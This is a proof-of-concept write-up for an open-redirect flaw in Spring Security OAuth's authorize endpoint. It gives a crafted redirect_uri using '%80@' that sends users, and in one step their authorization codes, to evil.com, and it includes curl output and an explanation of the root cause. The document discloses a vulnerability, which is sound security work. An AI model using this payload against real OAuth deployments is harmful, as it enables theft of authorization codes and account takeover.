
POC around https://github.com/spring-projects/spring-security-oauth/issues/1566

1) start app

./gradlew bootRun

2a) POC - Redirect without login (response type unknown)

open the following url in your browser / curl


-> RESULT: 302 Redirect to evil.com which can be seen in the curl output (see Location response header):

$ curl -v "http://localhost:8080/oauth/authorize?client_id=clientId&redirect_uri=http://evil.com%80@trusted.com&response_type=bogus"
  *   Trying ::1...
  * Connected to localhost (::1) port 8080 (#0)
  > GET /oauth/authorize?client_id=clientId&redirect_uri=http://evil.com%80@trusted.com&response_type=bogus HTTP/1.1
  > Host: localhost:8080
  > User-Agent: curl/7.54.0
  > Accept: */*
  < HTTP/1.1 302
  < Location: http://evil.com?@trusted.com?error=unsupported_response_type&error_description=Unsupported%20response%20types:%20%5Bbogus%5D
  < Content-Language: en-US
  < Content-Length: 0
  < Date: Fri, 25 Jan 2019 05:10:00 GMT
  * Connection #0 to host localhost left intact

2b) POC - Redirect with authorization code

  1. open the following url in your browser


  2. Login with 'user' / 'password'

  3. Observe 302 redirect with authorization code to attacker website, e.g.



Tomcat 8 defaults to UTF-8 to decode request params. %80 can't be decoded as it's an invalid UTF-8 hence it gets replaced by . This character isn't a valid in ISO 8859-1 which is used to serialize headers. This character gets replaced with ? which leads to open redirect whenever oauth2 redirects back to the resource service (in both success or error cases!!!).